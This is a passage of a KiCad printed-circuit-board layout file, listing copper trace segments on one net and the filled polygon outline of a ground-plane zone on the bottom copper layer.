97.028 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 56.308 22.86) (end 56.308 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 71.548 22.86) (end 71.548 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 86.788 22.86) (end 86.788 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 102.028 22.86) (end 102.028 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 112.014 38.1) (end 109.474 38.1) (width 1) (layer F.Cu) (net 45) (status 30)) (segment (start 34.544 34.29) (end 30.48 34.29) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 34.544 34.29) (end 37.084 34.29) (width 1) (layer F.Cu) (net 45) (status 30)) (segment (start 29.972 33.782) (end 26.448564 33.782) (width 1) (layer F.Cu) (net 45)) (segment (start 30.48 34.29) (end 29.972 33.782) (width 1) (layer F.Cu) (net 45) (tstamp 5B70B236) (status 20)) (segment (start 26.448564 33.782) (end 24.638 31.971436) (width 1) (layer F.Cu) (net 45)) (segment (start 24.638 31.971436) (end 24.638 30.734) (width 1) (layer F.Cu) (net 45)) (zone (net 1) (net_name GND) (layer B.Cu) (tstamp 6097A578) (hatch edge 0.508) (connect_pads (clearance 0.508)) (min_thickness 0.254) (fill yes (arc_segments 16) (thermal_gap 0.508) (thermal_bridge_width 0.508)) (polygon (pts (xy 115.7 67.7) (xy 20.3 67.7) (xy 20.3 20.3) (xy 115.7 20.3) ) ) (filled_polygon (pts (xy 27.470842 20.726708) (xy 26.832395 20.919038) (xy 26.243738 21.232228) (xy 26.232859 21.239497) (xy 25.926677 21.683072) (xy 28.128 23.884395) (xy 30.329323 21.683072) (xy 30.023141 21.239497) (xy 29.435694 20.924046) (xy 28.797992 20.72926) (xy 28.606222 20.71) (xy 107.683932 20.71) (xy 107.482078 20.903683) (xy 107.29799 21.167239) (xy 107.168856 21.461645) (xy 107.137876 21.589566) (xy 107.257223 21.843) (xy 109.601 21.843) (xy 109.601 21.823) (xy 109.855 21.823) (xy 109.855 21.843) (xy 112.198777 21.843) (xy 112.318124 21.589566) (xy 112.287144 21.461645) (xy 112.15801 21.167239) (xy 111.973922 20.903683) (xy 111.772068 20.71) (xy 115.29 20.71) (xy 115.290001 67.29) (xy 112.052251 67.29) (xy 112.163158 67.279292) (xy 112.801605 67.086962) (xy 113.390262 66.773772) (xy 113.401141 66.766503) (xy 113.707323 66.322928) (xy 111.506 64.121605) (xy 109.304677 66.322928) (xy 109.610859 66.766503) (xy 110.198306 67.081954) (xy 110.836008 67.27674) (xy 110.968037 67.29) (xy 90.533311 67.29) (xy 90.624572 67.188465) (xy 90.775697 66.933937) (xy 90.874263 66.654816) (xy 90.753905 66.421) (xy 89.535 66.421) (xy 89.535 66.441) (xy 89.281 66.441) (xy 89.281 66.421) (xy 86.995 66.421) (xy 86.995 66.441) (xy 86.741 66.441) (xy 86.741 66.421) (xy 84.455 66.421) (xy 84.455 66.441) (xy 84.201 66.441) (xy 84.201 66.421) (xy 81.915 66.421) (xy 81.915 66.441) (xy 81.661 66.441) (xy 81.661 66.421) (xy 80.43675 66.421) (xy 80.278 66.57975) (xy 80.274928 67.169) (xy 80.286845 67.29) (xy 28.674251 67.29) (xy 28.785158 67.279292) (xy 29.423605 67.086962) (xy 30.012262 66.773772) (xy 30.023141 66.766503) (xy 30.329323 66.322928) (xy 28.128 64.121605) (xy 25.926677 66.322928) (xy 26.232859 66.766503) (xy 26.820306 67.081954) (xy 27.458008 67.27674) (xy 27.590037 67.29) (xy 20.71 67.29) (xy 20.71 63.935457) (xy 24.726628 63.935457) (xy 24.790708 64.599158) (xy 24.983038 65.237605) (xy 25.296228 65.826262) (xy 25.303497 65.837141) (xy 25.747072 66.143323) (xy 27.948395 63.942) (xy 28.307605 63.942) (xy 30.508928 66.143323) (xy 30.952503 65.837141) (xy 31.267954 65.249694) (xy 31.46274 64.611992) (xy 31.529372 63.948543) (xy 31.465292 63.284842) (xy 31.272962 62.646395) (xy 30.959772 62.057738) (xy 30.952503 62.046859) (xy 30.508928 61.740677) (xy 28.307605 63.942) (xy 27.948395 63.942) (xy 25.747072 61.740677) (xy 25.303497 62.046859) (xy 24.988046 62.634306) (xy 24.79326 63.272008) (xy 24.726628 63.935457) (xy 20.71 63.935457) (xy 20.71 61.561072) (xy 25.926677 61.561072) (xy 28.128 63.762395) (xy 30.329323 61.561072) (xy 30.023141 61.117497) (xy 29.435694 60.802046) (xy 28.797992 60.60726) (xy 28.134543 60.540628) (xy 27.470842 60.604708) (xy 26.832395 60.797038) (xy 26.243738 61.110228) (xy 26.232859 61.117497) (xy 25.926677 61.561072) (xy 20.71 61.561072) (xy 20.71 60.339) (xy 80.274928 60.339) (xy 80.274928 62.089) (xy 80.287188 62.213482) (xy 80.323498 62.33318) (xy 80.382463 62.443494) (xy 80.415705 62.484) (xy 80.382463 62.524506) (xy 80.323498 62.63482) (xy 80.287188 62.754518) (xy 80.274928 62.879) (xy 80.274928 64.629) (xy 80.287188 64.753482) (xy 80.323498 64.87318) (xy 80.382463 64.983494) (xy 80.415705 65.024) (xy 80.382463 65.064506) (xy 80.323498 65.17482) (xy 80.287188 65.294518) (xy 80.274928 65.419) (xy 80.278 66.00825) (xy 80.43675 66.167) (xy 81.661 66.167) (xy 81.661 66.147) (xy 81.915 66.147) (xy 81.915 66.167) (xy 84.201 66.167) (xy 84.201 66.147) (xy 84.455 66.147) (xy 84.455 66.167) (xy 86.741 66.167) (xy 86.741 66.147) (xy 86.995 66.147) (xy 86.995 66.167) (xy 89.281 66.167) (xy 89.281 66.147) (xy 89.535 66.147) (xy 89.535 66.167) (xy 90.753905 66.167) (xy 90.874263 65.933184) (xy 90.775697 65.654063) (xy 90.624572 65.399535) (xy 90.426694 65.17938) (xy 90.369597 65.136665) (xy 91.529 65.136665) (xy 91.529 65.419335) (xy 91.584147 65.696574) (xy 91.69232 65.957727) (xy 91.849363 66.192759) (xy 92.049241 66.392637) (xy 92.284273 66.54968) (xy 92.545426 66.657853) (xy 92.822665 66.713) (xy 93.105335 66.713) (xy 93.382574 66.657853) (xy 93.643727 66.54968) (xy 93.878759 66.392637) (xy 94.078637 66.192759) (xy 94.23568 65.957727) (xy 94.343853 65.696574) (xy 94.399 65.419335) (xy 94.399 65.136665) (xy 94.343853 64.859426) (xy 94.23568 64.598273) (xy 94.078637 64.363241) (xy 93.878759 64.163363) (xy 93.643727 64.00632) (xy 93.633135 64.001933) (xy 93.819131 63.890385) (xy 94.027519 63.701414) (xy 94.195037 63.47542) (xy 94.315246 63.221087) (xy 94.355904 63.087039) (xy 94.233915 62.865) (xy 93.091 62.865) (xy 93.091 62.885) (xy 92.837 62.885) (xy 92.837 62.865) (xy 91.694085 62.865) (xy 91.572096 63.087039) (xy 91.612754 63.221087) (xy 91.732963 63.47542) (xy 91.900481 63.701414) (xy 92.108869 63.890385) (xy 92.294865 64.001933) (xy 92.284273 64.00632) (xy 92.049241 64.163363) (xy 91.849363 64.363241) (xy 91.69232 64.598273) (xy 91.584147 64.859426) (xy 91.529 65.136665) (xy 90.369597 65.136665) (xy 90.221941 65.026203) (xy 90.370569 64.926893) (xy 90.580893 64.716569) (xy 90.746144 64.469253) (xy 90.859971 64.194451) (xy 90.918 63.902722) (xy 90.918 63.605278) (xy 90.859971 63.313549) (xy 90.746144 63.038747) (xy 90.580893 62.791431) (xy 90.370569 62.581107) (xy 90.225238 62.484) (xy 90.370569 62.386893) (xy 90.580893 62.176569) (xy 90.746144 61.929253) (xy 90.859971 61.654451) (xy 90.918 61.362722) (xy 90.918 61.065278) (xy 90.859971 60.773549) (xy 90.746144 60.498747) (xy 90.580893 60.251431) (xy 90.370569 60.041107) (xy 90.123253 59.875856) (xy 90.054717 59.847467) (xy 90.259013 59.710962) (xy 90.444962 59.525013) (xy 90.591061 59.306359) (xy 90.691696 59.063405) (xy 90.743 58.805486) (xy 90.743 58.542514) (xy 90.691696 58.284595) (xy 90.591061 58.041641) (xy 90.444962 57.822987) (xy 90.259013 57.637038) (xy 90.040359 57.490939) (xy 89.797405 57.390304) (xy 89.539486 57.339) (xy 89.276514 57.339) (xy 89.018595 57.390304) (xy 88.775641 57.490939) (xy 88.556987 57.637038) (xy 88.371038 57.822987) (xy 88.224939 58.041641) (xy 88.138 58.25153) (xy 88.051061 58.041641) (xy 87.904962 57.822987) (xy 87.719013 57.637038) (xy 87.500359 57.490939) (xy 87.257405 57.390304) (xy 86.999486 57.339) (xy 86.736514 57.339) (xy 86.478595 57.390304) (xy 86.235641 57.490939) (xy 86.016987 57.637038) (xy 85.831038 57.822987) (xy 85.684939 58.041641) (xy 85.598 58.25153) (xy 85.511061 58.041641) (xy 85.364962 57.822987) (xy 85.179013 57.637038) (xy 84.960359 57.490939) (xy 84.717405 57.390304) (xy 84.459486 57.339) (xy 84.196514 57.339) (xy 83.938595 57.390304) (xy 83.695641 57.490939) (xy 83.476987 57.637038) (xy 83.291038 57.822987) (xy 83.144939 58.041641) (xy 83.058 58.25153) (xy 82.971061 58.041641) (xy 82.824962 57.822987) (xy 82.639013 57.637038) (xy 82.420359 57.490939) (xy 82.177405 57.390304) (xy 81.919486 57.339) (xy 81.656514 57.339) (xy 81.398595 57.390304) (xy 81.155641 57.490939) (xy 80.936987 57.637038) (xy 80.751038 57.822987) (xy 80.604939 58.041641) (xy 80.504304 58.284595) (xy 80.453 58.542514) (xy 80.453 58.805486) (xy 80.504304 59.063405) (xy 80.604939 59.306359) (xy 80.751038 59.525013) (xy 80.926953 59.700928) (xy 80.913 59.700928) (xy 80.788518 59.713188) (xy 80.66882 59.749498) (xy 80.558506 59.808463) (xy 80.461815 59.887815) (xy 80.382463 59.984506) (xy 80.323498 60.09482) (xy 80.287188 60.214518) (xy 80.274928 60.339) (xy 20.71 60.339) (xy 20.71 55.856702) (xy 44.454903 55.856702) (xy 44.526486 56.100671) (xy 44.781996 56.221571) (xy 45.056184 56.2903) (xy 45.338512 56.304217) (xy 45.61813 56.262787) (xy 45.884292 56.167603) (xy 46.009514 56.100671) (xy 46.081097 55.856702) (xy 45.268 55.043605) (xy 44.454903 55.856702) (xy 20.71 55.856702) (xy 20.71 54.934512) (xy 43.827783 54.934512) (xy 43.869213 55.21413) (xy 43.964397 55.480292) (xy 44.031329 55.605514) (xy 44.275298 55.677097) (xy 45.088395 54.864) (xy 45.447605 54.864) (xy 46.260702 55.677097) (xy 46.504671 55.605514) (xy 46.625571 55.350004) (xy 46.6943 55.075816) (xy 46.708217 54.793488) (xy 46.666787 54.51387) (xy 46.571603 54.247708) (xy 46.504671 54.122486) (xy 46.30534 54.064) (xy 47.329928 54.064) (xy 47.329928 55.664) (xy 47.342188 55.788482) (xy 47.378498 55.90818) (xy 47.437463 56.018494) (xy 47.516815 56.115185) (xy 47.613506 56.194537) (xy 47.72382 56.253502) (xy 47.843518 56.289812) (xy 47.968 56.302072) (xy 49.568 56.302072) (xy 49.692482 56.289812) (xy 49.81218 56.253502) (xy 49.922494 56.194537) (xy 50.019185 56.115185) (xy 50.098537 56.018494) (xy 50.157502 55.90818) (xy 50.193812 55.788482) (xy 50.206072 55.664) (xy 50.206072 54.064) (xy 50.193812 53.939518) (xy 50.157502 53.81982) (xy 50.098537 53.709506) (xy 50.019185 53.612815) (xy 49.922494 53.533463) (xy 49.81218 53.474498) (xy 49.692482 53.438188) (xy 49.568 53.425928) (xy 47.968 53.425928) (xy 47.843518 53.438188) (xy 47.72382 53.474498) (xy 47.613506 53.533463) (xy 47.516815 53.612815) (xy 47.437463 53.709506) (xy 47.378498 53.81982) (xy 47.342188 53.939518) (xy 47.329928 54.064) (xy 46.30534 54.064) (xy 46.260702 54.050903) (xy 45.447605 54.864) (xy 45.088395 54.864) (xy 44.275298 54.050903) (xy 44.031329 54.122486) (xy 43.910429 54.377996) (xy 43.8417 54.652184) (xy 43.827783 54.934512) (xy 20.71 54.934512) (xy 20.71 53.871298) (xy 44.454903 53.871298) (xy 45.268 54.684395) (xy 46.081097 53.871298) (xy 46.009514 53.627329) (xy 45.754004 53.506429) (xy 45.479816 53.4377) (xy 45.197488 53.423783) (xy 44.91787 53.465213) (xy 44.651708 53.560397) (xy 44.526486 53.627329) (xy 44.454903 53.871298) (xy 20.71 53.871298) (xy 20.71 48.020173) (xy 24.743 48.020173) (xy 24.743 48.499827) (xy 24.836576 48.970263) (xy 25.020131 49.413405) (xy 25.286612 49.812222) (xy 25.625778 50.151388) (xy 26.024595 50.417869) (xy 26.467737 50.601424) (xy 26.938173 50.695) (xy 27.417827 50.695) (xy 27.888263 50.601424) (xy 28.331405 50.417869) (xy 28.730222 50.151388) (xy 29.069388 49.812222) (xy 29.335869 49.413405) (xy 29.519424 48.970263) (xy 29.613 48.499827) (xy 29.613 48.020173) (xy 29.519424 47.549737) (xy 29.335869 47.106595) (xy 29.069388 46.707778) (xy 28.730222 46.368612) (xy 28.331405 46.102131) (xy 27.888263 45.918576) (xy 27.417827 45.825) (xy 26.938173 45.825) (xy 26.467737 45.918576) (xy 26.024595 46.102131) (xy 25.625778 46.368612) (xy 25.286612 46.707778) (xy 25.020131 47.106595) (xy 24.836576 47.549737) (xy 24.743 48.020173) (xy 20.71 48.020173) (xy 20.71 37.962) (xy 20.813928 37.962) (xy 20.813928 39.762) (xy 20.826188 39.886482) (xy 20.862498 40.00618) (xy 20.921463 40.116494) (xy 21.000815 40.213185) (xy 21.097506 40.292537) (xy 21.20782 40.351502) (xy 21.321545 40.386) (xy 21.20782 40.420498) (xy 21.097506 40.479463) (xy 21.000815 40.558815) (xy 20.921463 40.655506) (xy 20.862498 40.76582) (xy 20.826188 40.885518) (xy 20.813928 41.01) (xy 20.813928 42.81) (xy 20.826188 42.934482) (xy 20.862498 43.05418) (xy 20.921463 43.164494) (xy 21.000815 43.261185) (xy 21.097506 43.340537) (xy 21.20782 43.399502) (xy 21.226127 43.405056) (xy 21.159688 43.471495) (xy 20.991701 43.722905) (xy 20.875989 44.002257) (xy 20.817 44.298816) (xy 20.817 44.601184) (xy 20.875989 44.897743) (xy 20.991701 45.177095) (xy 21.159688 45.428505) (xy 21.373495 45.642312) (xy 21.624905 45.810299) (xy 21.904257 45.926011) (xy 22.200816 45.985) (xy 22.503184 45.985) (xy 22.799743 45.926011) (xy 23.079095 45.810299) (xy 23.330505 45.642312) (xy 23.544312 45.428505) (xy 23.712299 45.177095) (xy 23.828011 44.897743) (xy 23.887 44.601184) (xy 23.887 44.298816) (xy 23.840395 44.064514) (xy 28.637 44.064514) (xy 28.637 44.327486) (xy 28.688304 44.585405) (xy 28.788939 44.828359) (xy 28.935038 45.047013) (xy 29.120987 45.232962) (xy 29.339641 45.379061) (xy 29.582595 45.479696) (xy 29.840514 45.531) (xy 30.103486 45.531) (xy 30.361405 45.479696) (xy 30.604359 45.379061) (xy 30.823013 45.232962) (xy 31.008962 45.047013) (xy 31.155061 44.828359) (xy 31.255696 44.585405) (xy 31.307 44.327486) (xy 31.307 44.064514) (xy 31.255696 43.806595) (xy 31.155061 43.563641) (xy 31.008962 43.344987) (xy 30.823013 43.159038) (xy 30.604359 43.012939) (xy 30.361405 42.912304) (xy 30.103486 42.861) (xy 29.840514 42.861) (xy 29.582595 42.912304) (xy 29.339641 43.012939) (xy 29.120987 43.159038) (xy 28.935038 43.344987) (xy 28.788939 43.563641) (xy 28.688304 43.806595) (xy 28.637 44.064514) (xy 23.840395 44.064514) (xy 23.828011 44.002257) (xy 23.712299 43.722905) (xy 23.544312 43.471495) (xy 23.477873 43.405056) (xy 23.49618 43.399502) (xy 23.606494 43.340537) (xy 23.703185 43.261185) (xy 23.782537 43.164494) (xy 23.841502 43.05418) (xy 23.877812 42.934482) (xy 23.890072 42.81) (xy 23.890072 42.741812) (xy 23.959724 42.798974) (xy 24.091753 42.869546) (xy 24.235014 42.913003) (xy 24.346667 42.924) (xy 24.346676 42.924) (xy 24.383999 42.927676) (xy 24.421322 42.924) (xy 24.628913 42.924) (xy 24.640188 43.038482) (xy 24.676498 43.15818) (xy 24.735463 43.268494) (xy 24.814815 43.365185) (xy 24.911506 43.444537) (xy 25.02182 43.503502) (xy 25.141518 43.539812) (xy 25.266 43.552072) (xy 26.266 43.552072) (xy 26.390482 43.539812) (xy 26.416 43.532071) (xy 26.441518 43.539812) (xy 26.566 43.552072) (xy 26.78025 43.549) (xy 26.939 43.39025) (xy 26.939 43.034593) (xy 26.960781 43.023012) (xy 27.013703 42.995345) (xy 27.015437 42.993951) (xy 27.017404 42.992905) (xy 27.063737 42.955117) (xy 27.110286 42.91769) (xy 27.111717 42.915985) (xy 27.113443 42.914577) (xy 27.151539 42.868527) (xy 27.189947 42.822754) (xy 27.19102 42.820802) (xy 27.192439 42.819087) (xy 27.193 42.818049) (xy 27.193 43.39025) (xy 27.35175 43.549) (xy 27.566 43.552072) (xy 27.690482 43.539812) (xy 27.81018 43.503502) (xy 27.920494 43.444537) (xy 28.017185 43.365185) (xy 28.096537 43.268494) (xy 28.155502 43.15818) (xy 28.191812 43.038482) (xy 28.204072 42.914) (xy 28.201 42.44975) (xy 28.04225 42.291) (xy 27.301 42.291) (xy 27.301 42.037) (xy 28.04225 42.037) (xy 28.201 41.87825) (xy 28.204072 41.414) (xy 28.191812 41.289518) (xy 28.155502 41.16982) (xy 28.096537 41.059506) (xy 28.017185 40.962815) (xy 27.920494 40.883463) (xy 27.81018 40.824498) (xy 27.690482 40.788188) (xy 27.566 40.775928) (xy 27.35175 40.779) (xy 27.193 40.93775) (xy 27.193 41.51026) (xy 27.157117 41.466263) (xy 27.11969 41.419714) (xy 27.117985 41.418283) (xy 27.116577 41.416557) (xy 27.070527 41.378461) (xy 27.024754 41.340053) (xy 27.022802 41.33898) (xy 27.021087 41.337561) (xy 26.968539 41.309149) (xy 26.939 41.292909) (xy 26.939 40.93775) (xy 26.78025 40.779) (xy 26.566 40.775928) (xy 26.441518 40.788188) (xy 26.416 40.795929) (xy 26.390482 40.788188) (xy 26.266 40.775928) (xy 25.266 40.775928) (xy 25.141518 40.788188) (xy 25.02182 40.824498) (xy 24.911506 40.883463) (xy 24.814815 40.962815) (xy 24.735463 41.059506) (xy 24.676498 41.16982) (xy 24.640188 41.289518) (xy 24.635084 41.341343) (xy 24.554276 41.275026) (xy 24.422247 41.204454) (xy 24.278986 41.160997) (xy 24.167333 41.15) (xy 24.167322 41.15) (xy 24.13 41.146324) (xy 24.092678 41.15) (xy 23.890072 41.15) (xy 23.890072 41.01) (xy 23.877812 40.885518) (xy 23.841502 40.76582) (xy 23.782537 40.655506) (xy 23.703185 40.558815) (xy 23.606494 40.479463) (xy 23.49618 40.420498) (xy 23.382455 40.386) (xy 23.49618 40.351502) (xy 23.606494 40.292537) (xy 23.703185 40.213185) (xy 23.782537 40.116494) (xy 23.841502 40.00618) (xy 23.877812 39.886482) (xy 23.890072 39.762) (xy 23.890072 37.962) (xy 23.877812 37.837518) (xy 23.841502 37.71782) (xy 23.782537 37.607506) (xy 23.703185 37.510815) (xy 23.606494 37.431463) (xy 23.49618 37.372498) (xy 23.477873 37.366944) (xy 23.544312 37.300505) (xy 23.712299 37.049095) (xy 23.828011 36.769743) (xy 23.887 36.473184) (xy 23.887 36.444514) (xy 28.637 36.444514) (xy 28.637 36.707486) (xy 28.688304 36.965405) (xy 28.788939 37.208359) (xy 28.935038 37.427013) (xy 29.120987 37.612962) (xy 29.339641 37.759061) (xy 29.582595 37.859696) (xy 29.840514 37.911) (xy 30.103486 37.911) (xy 30.151865 37.901377) (xy 32.165105 39.914618) (xy 32.190472 39.945528) (xy 32.22138 39.970893) (xy 32.313811 40.046749) (xy 32.454526 40.121963) (xy 32.490063 40.132743) (xy 32.607212 40.16828) (xy 32.726209 40.18) (xy 32.726212 40.18) (xy 32.766 40.183919) (xy 32.805788 40.18) (xy 33.29923 40.18) (xy 33.390525 40.316632) (xy 33.597368 40.523475) (xy 33.77176 40.64) (xy 33.597368 40.756525) (xy 33.390525 40.963368) (xy 33.22801 41.206589) (xy 33.116068 41.476842) (xy 33.059 41.76374) (xy 33.059 42.05626) (xy 33.116068 42.343158) (xy 33.22801 42.613411) (xy 33.390525 42.856632) (xy 33.597368 43.063475) (xy 33.77176 43.18) (xy 33.597368 43.296525) (xy 33.390525 43.503368) (xy 33.22801 43.746589) (xy 33.116068 44.016842) (xy 33.059 44.30374) (xy 33.059 44.59626) (xy 33.116068 44.883158) (xy 33.22801 45.153411) (xy 33.390525 45.396632) (xy 33.597368 45.603475) (xy 33.77176 45.72) (xy 33.597368 45.836525) (xy 33.390525 46.043368) (xy 33.22801 46.286589) (xy 33.116068 46.556842) (xy 33.059 46.84374) (xy 33.059 47.13626) (xy 33.116068 47.423158) (xy 33.22801 47.693411) (xy 33.390525 47.936632) (xy 33.597368 48.143475) (xy 33.77176 48.26) (xy 33.597368 48.376525) (xy 33.390525 48.583368) (xy 33.22801 48.826589) (xy 33.116068 49.096842) (xy 33.059 49.38374) (xy 33.059 49.67626) (xy 33.116068 49.963158) (xy 33.22801 50.233411) (xy 33.390525 50.476632) (xy 33.597368 50.683475) (xy 33.840589 50.84599) (xy 34.110842 50.957932) (xy 34.39774 51.015) (xy 34.69026 51.015) (xy 34.977158 50.957932) (xy 35.014128 50.942618) (xy 35.015721 50.958788) (xy 35.061534 51.109811) (xy 35.062038 51.111473) (xy 35.137251 51.252189) (xy 35.167684 51.289271) (xy 35.238473 51.375528) (xy 35.269383 51.400895) (xy 35.975105 52.106618) (xy 36.000472 52.137528) (xy 36.123811 52.238749) (xy 36.264527 52.313963) (xy 36.417212 52.36028) (xy 36.536209 52.372) (xy 36.536212 52.372) (xy 36.576 52.375919) (xy 36.613615 52.372214) (xy 36.641111 52.390586) (xy 36.811271 52.461068) (xy 36.991911 52.497) (xy 37.176089 52.497) (xy 37.356729 52.461068) (xy 37.526889 52.390586) (xy 37.680028 52.288262) (xy 37.810262 52.158028) (xy 37.912586 52.004889) (xy 37.983068 51.834729) (xy 38.019 51.654089) (xy 38.019 51.469911) (xy 37.983068 51.289271) (xy 37.912586 51.119111) (xy 37.810262 50.965972) (xy 37.766804 50.922514) (xy 80.453 50.922514) (xy 80.453 51.185486) (xy 80.504304 51.443405) (xy 80.604939 51.686359) (xy 80.751038 51.905013) (xy 80.936987 52.090962) (xy 81.155641 52.237061) (xy 81.398595 52.337696) (xy 81.656514 52.389) (xy 81.919486 52.389) (xy 82.177405 52.337696) (xy 82.420359 52.237061) (xy 82.639013 52.090962) (xy 82.824962 51.905013) (xy 82.971061 51.686359) (xy 83.058 51.47647) (xy 83.144939 51.686359) (xy 83.291038 51.905013) (xy 83.476987 52.090962) (xy 83.695641 52.237061) (xy 83.938595 52.337696) (xy 84.196514 52.389) (xy 84.459486 52.389) (xy 84.717405 52.337696) (xy 84.960359 52.237061) (xy 85.179013 52.090962) (xy 85.364962 51.905013) (xy 85.511061 51.686359) (xy 85.598 51.47647) (xy 85.684939 51.686359) (xy 85.831038 51.905013) (xy 86.016987 52.090962) (xy 86.235641 52.237061) (xy 86.478595 52.337696) (xy 86.736514 52.389) (xy 86.999486 52.389) (xy 87.257405 52.337696) (xy 87.500359 52.237061) (xy 87.719013 52.090962) (xy 87.904962 51.905013) (xy 88.051061 51.686359) (xy 88.138 51.47647) (xy 88.224939 51.686359) (xy 88.371038 51.905013) (xy 88.556987 52.090962) (xy 88.775641 52.237061) (xy 89.018595 52.337696) (xy 89.276514 52.389) (xy 89.539486 52.389) (xy 89.797405 52.337696) (xy 90.040359 52.237061) (xy 90.259013 52.090962) (xy 90.444962 51.905013) (xy 90.591061 51.686359) (xy 90.691696 51.443405) (xy 90.743 51.185486) (xy 90.743 50.922514) (xy 90.691696 50.664595) (xy 90.591061 50.421641) (xy 90.444962 50.202987) (xy 90.259013 50.017038) (xy 90.040359 49.870939) (xy 89.83047 49.784) (xy 90.040359 49.697061) (xy 90.259013 49.550962) (xy 90.444962 49.365013) (xy 90.591061 49.146359) (xy 90.691696 48.903405) (xy 90.743 48.645486) (xy 90.743 48.382514) (xy 90.691696 48.124595) (xy 90.591061 47.881641) (xy 90.444962 47.662987) (xy 90.259013 47.477038) (xy 90.078861 47.356665) (xy 91.529 47.356665) (xy 91.529 47.639335) (xy 91.584147 47.916574) (xy 91.69232 48.177727) (xy 91.849363 48.412759) (xy 92.049241 48.612637) (xy 92.281759 48.768) (xy 92.049241 48.923363) (xy 91.849363 49.123241) (xy 91.69232 49.358273) (xy 91.584147 49.619426) (xy 91.529 49.896665) (xy 91.529 50.179335) (xy 91.584147 50.456574) (xy 91.69232 50.717727) (xy 91.849363 50.952759) (xy 92.049241 51.152637) (xy 92.281759 51.308) (xy 92.049241 51.463363) (xy 91.849363 51.663241) (xy 91.69232 51.898273) (xy 91.584147 52.159426) (xy 91.529 52.436665) (xy 91.529 52.719335) (xy 91.584147 52.996574) (xy 91.69232 53.257727) (xy 91.849363 53.492759) (xy 92.049241 53.692637) (xy 92.281759 53.848) (xy 92.049241 54.003363) (xy 91.849363 54.203241) (xy 91.69232 54.438273) (xy 91.584147 54.699426) (xy 91.529 54.976665) (xy 91.529 55.259335) (xy 91.584147 55.536574) (xy 91.69232 55.797727) (xy 91.849363 56.032759) (xy 92.049241 56.232637) (xy 92.281759 56.388) (xy 92.049241 56.543363) (xy 91.849363 56.743241) (xy 91.69232 56.978273) (xy 91.584147 57.239426) (xy 91.529 57.516665) (xy 91.529 57.799335) (xy 91.584147 58.076574) (xy 91.69232 58.337727) (xy 91.849363 58.572759) (xy 92.049241 58.772637) (xy 92.281759 58.928) (xy 92.049241 59.083363) (xy 91.849363 59.283241) (xy 91.69232 59.518273) (xy 91.584147 59.779426) (xy 91.529 60.056665) (xy 91.529 60.339335) (xy 91.584147 60.616574) (xy 91.69232 60.877727) (xy 91.849363 61.112759) (xy 92.049241 61.312637) (xy 92.284273 61.46968) (xy 92.294865 61.474067) (xy 92.108869 61.585615) (xy 91.900481 61.774586) (xy 91.732963 62.00058) (xy 91.612754 62.254913) (xy 91.572096 62.388961) (xy 91.694085 62.611) (xy 92.837 62.611) (xy 92.837 62.591) (xy 93.091 62.591) (xy 93.091 62.611) (xy 94.233915 62.611) (xy 94.355904 62.388961) (xy 94.315246 62.254913) (xy 94.195037 62.00058) (xy 94.027519 61.774586) (xy 93.819131 61.585615) (xy 93.633135 61.474067) (xy 93.643727 61.46968) (xy 93.878759 61.312637) (xy 94.078637 61.112759) (xy 94.23568 60.877727) (xy 94.343853 60.616574) (xy 94.399 60.339335) (xy 94.399 60.056665) (xy 94.343853 59.779426) (xy 94.23568 59.518273) (xy 94.078637 59.283241) (xy 93.878759 59.083363) (xy 93.646241 58.928) (xy 93.878759 58.772637) (xy 94.078637 58.572759) (xy 94.23568 58.337727) (xy 94.343853 58.076574) (xy 94.399 57.799335) (xy 94.399 57.516665) (xy 94.343853 57.239426) (xy 94.23568 56.978273) (xy 94.078637 56.743241) (xy 93.878759 56.543363) (xy 93.646241 56.388) (xy 93.878759 56.232637) (xy 94.078637 56.032759) (xy 94.23568 55.797727) (xy 94.343853 55.536574) (xy 94.399 55.259335) (xy 94.399 54.976665) (xy 94.343853 54.699426) (xy 94.23568 54.438273) (xy 94.078637 54.203241) (xy 93.878759 54.003363) (xy 93.646241 53.848) (xy 93.878759 53.692637) (xy 94.078637 53.492759) (xy 94.23568 53.257727) (xy 94.343853 52.996574) (xy 94.399 52.719335) (xy 94.399 52.436665) (xy 94.343853 52.159426) (xy 94.23568 51.898273) (xy 94.078637 51.663241) (xy 93.878759 51.463363) (xy 93.646241 51.308) (xy 93.878759 51.152637) (xy 94.078637 50.952759) (xy 94.23568 50.717727) (xy 94.343853 50.456574) (xy 94.399 50.179335) (xy 94.399 49.896665) (xy 99.149 49.896665) (xy 99.149 50.179335) (xy 99.204147 50.456574) (xy 99.31232 50.717727) (xy 99.469363 50.952759) (xy 99.669241 51.152637) (xy 99.901759 51.308) (xy 99.669241 51.463363) (xy 99.469363 51.663241) (xy 99.31232 51.898273) (xy 99.204147 52.159426) (xy 99.149 52.436665) (xy 99.149 52.719335) (xy 99.204147 52.996574) (xy 99.31232 53.257727) (xy 99.469363 53.492759) (xy 99.669241 53.692637) (xy 99.901759 53.848) (xy 99.669241 54.003363) (xy 99.469363 54.203241) (xy 99.31232 54.438273) (xy 99.204147 54.699426) (xy 99.149 54.976665) (xy 99.149 55.259335) (xy 99.204147 55.536574) (xy 99.31232 55.797727) (xy 99.469363 56.032759) (xy 99.669241 56.232637) (xy 99.901759 56.388) (xy 99.669241 56.543363) (xy 99.469363 56.743241) (xy 99.31232 56.978273) (xy 99.204147 57.239426) (xy 99.149 57.516665) (xy 99.149 57.799335) (xy 99.204147 58.076574) (xy 99.31232 58.337727) (xy 99.469363 58.572759) (xy 99.669241 58.772637) (xy 99.901759 58.928) (xy 99.669241 59.083363) (xy 99.469363 59.283241) (xy 99.31232 59.518273) (xy 99.204147 59.779426) (xy 99.149 60.056665) (xy 99.149 60.339335) (xy 99.204147 60.616574) (xy 99.31232 60.877727) (xy 99.469363 61.112759) (xy 99.669241 61.312637) (xy 99.901759 61.468) (xy 99.669241 61.623363) (xy 99.469363 61.823241) (xy 99.31232 62.058273) (xy 99.204147 62.319426) (xy 99.149 62.596665) (xy 99.149 62.879335) (xy 99.204147 63.156574) (xy 99.31232 63.417727) (xy 99.469363 63.652759) (xy 99.669241 63.852637) (xy 99.901759 64.008) (xy 99.669241 64.163363) (xy 99.469363 64.363241) (xy 99.31232 64.598273) (xy 99.204147 64.859426) (xy 99.149 65.136665) (xy 99.149 65.419335) (xy 99.204147 65.696574) (xy 99.31232 65.957727) (xy 99.469363 66.192759) (xy 99.669241 66.392637) (xy 99.904273 